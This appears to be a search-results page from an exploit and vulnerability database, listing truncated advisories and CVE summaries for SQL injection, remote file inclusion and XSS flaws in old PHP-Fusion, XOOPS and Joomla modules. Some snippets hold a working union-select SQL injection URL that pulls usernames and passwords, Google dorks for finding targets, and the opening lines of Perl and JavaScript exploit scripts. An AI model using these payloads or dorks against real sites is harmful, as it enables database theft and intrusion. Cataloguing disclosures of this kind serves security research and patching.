7210 matches found
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
-------------------------------- PHP-FUSION Arcade Module cid Remote SQL Injection Vuln -------------------------------- Bulan: xoron xoron.biz -------------------------------- Exploit: index.php?op=viewgamelist&cid=-1//union//select//null,username,userpassword,null,null,null//from//fusionusers/...
Remote File Include In Script stat12
By Hasadya Raed Contact : [email protected] Israel --------------------------- Script : stat12 Download Script : http://www.samphp.com Dork : Copyright c 2004 by Sam Tang Greetz : Yonatan --------------------------- B.File : index.php --------------------------- Expl :...
Malaika System MyAds Xoops模块Index.php SQL注入漏洞
Malaika System MyAds是一款基于PHP的WEB应用程序。 Malaika System MyAds不正确过滤用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,可获得敏感信息。 问题是'Index.PHP'脚本对用户提交的'cid'参数缺少过滤,提交恶意SQL代码作为参数数据,可导致更改原来的SQL逻辑,获得敏感信息。 Malaika System MyAds 2.04jp 目前没有解决方案提供: http://malaika.s31.xrea.com/ !/usr/bin/perl Script Name: Xoops Module MyAds Bug Fix ...
2BGal 3.1.1 <= (admin/index.php) Remote File Include Vulnerability
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 2BGal 3.1.1 = admin/index.php Remote File Include Vulnerability Script: 2BGal Version: 3.1.1 Download: http://www.ben3w.com/multimedia/2bgal.zip Discover: BorN To K!LL =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= Bug in:...
CVE-2007-1811
The vulnerability described as CVE-2007-1811 affects the Tiny Event module for XOOPS (version 1.01 and earlier). It is a SQL injection in index.php where the id parameter used by the show action allows remote attackers to execute arbitrary SQL commands. This is the confirmed root cause: improper ...
slaed-rfi.txt
By Hasadya Raed Contact : [email protected] Israel ----------------------------------------------- Script : SLAEDCMS2 Dork : "Web site engine code is Copyright © 2006 by SLAED CMS. All rights reserved" ----------------------------------------------- B.Files : admin.php index.php...
PHP-Fusion Module topliste 1.0 - cid SQL Injection
PHP-Fusion Module topliste 1.0 - cid SQL Injection -------------------------------- PHP-FUSION topliste Module cid Remote SQL Injection Vuln -------------------------------- Bulan: xoron - unique xoron.biz -------------------------------- Exploit:...
Xoops Module Lykos Reviews 1.00 (index.php) SQL Injection Exploit
No description provided by source. html head titleXOOPS Module Lykos Reviews 1.00 index.php BLIND SQL Injection Exploit/title script type="text/javascript" //'=============================================================================================== //'Script Name: XOOPS Module Lykos Reviews...
Remot File Include In SLAED_CMS_2
By Hasadya Raed Contact : [email protected] Israel ----------------------------------------------- Script : SLAEDCMS2 Dork : "Web site engine code is Copyright © 2006 by SLAED CMS. All rights reserved" ----------------------------------------------- B.Files : admin.php index.php...
XOOPS Module Lykos Reviews 1.00 - index.php SQL Injection
XOOPS Module Lykos Reviews 1.00 - index.php SQL Injection XOOPS Module Lykos Reviews 1.00 index.php BLIND SQL Injection Exploit //'=============================================================================================== //'Script Name: XOOPS Module Lykos Reviews 1.00 index.php BLIND SQL...
CVE-2007-1776
The vulnerability CVE-2007-1776 affects the DesignForJoomla.com D4J eZine (com_ezine) Joomla! extension (version 2.8 and earlier). The root cause is an SQL injection in index.php that allows remote attackers to execute arbitrary SQL commands via the article parameter in a read action. The connect...
Joomla! D4JeZine组件index.php SQL注入漏洞
Joomla! D4JeZine是一款基于PHP的WEB应用程序。 Joomla! D4JeZine不正确过滤用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,可获得敏感信息。 问题是'Index.PHP'脚本对用户提交的WEB参数缺少过滤,提交恶意SQL代码作为参数数据,可导致更改原来的SQL逻辑,获得敏感信息。 DesignForJoomla D4J eZine 2.8 目前没有解决方案提供: http://designforjoomla.com/joomlaextensions/d4jezine.php html head titleJoomla Component...
XOOPS Module MyAds Bug Fix 2.04jp - index.php SQL Injection
XOOPS Module MyAds Bug Fix 2.04jp - index.php SQL Injection !/usr/bin/perl Script Name: Xoops Module MyAds Bug Fix : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; $target =...
XOOPS Module MyAds Bug Fix 2.04jp - 'index.php' SQL Injection
!/usr/bin/perl Script Name: Xoops Module MyAds Bug Fix : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; $target =...
CVE-2007-1729
SQL injection vulnerability in includes/start.php in Flexbb 1.0.0 10005 Beta Release 1 allows remote attackers to execute arbitrary SQL commands via the flexbblangid COOKIE parameter to index.php...
Cross site scripting
Cross-site scripting XSS vulnerability in index.php in CcCounter 2.0 allows remote attackers to inject arbitrary web script or HTML via dir parameter...
CVE-2007-1714
CcCounter 2.0 contains a cross-site scripting (XSS) vulnerability in index.php through the dir parameter. The issue arises from insufficient input handling of dir, enabling remote attackers to inject arbitrary scripts/HTML that may be executed in a user’s browser. Impact is partial confidentialit...
ccc20-xss.txt
--------------------------------------- Title : CcCounter 2.0 cross-site scripting vulnerability Found By : CrackersChild Contact : localexploitdothotmaildotcom Dork : CcCounter 2.0 Statistics Exploit :...
Net-Side.net CMS (index.php cms) Remote File Inclusion Vulnerability
No description provided by source. I see your future and your future is death. Sharingan ! -------------------------------------------------------------------------------------------------------------- Hi I'm sharingan and this is my vuln : script name : Net Side Content Management System 2...
Joomla Component Car Manager <= 1.1 Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl Script Name: Joomla Component Car Manager = 1.1 Blind SQL Injection Exploit Coded by : ajann Author : ajann Dork : "index.php?option=comresman" Contact : : S.Page : http://www.webformatique.net $$ : .39.99 .. : ajann,Turkey use IO::Socket; if@ARGV...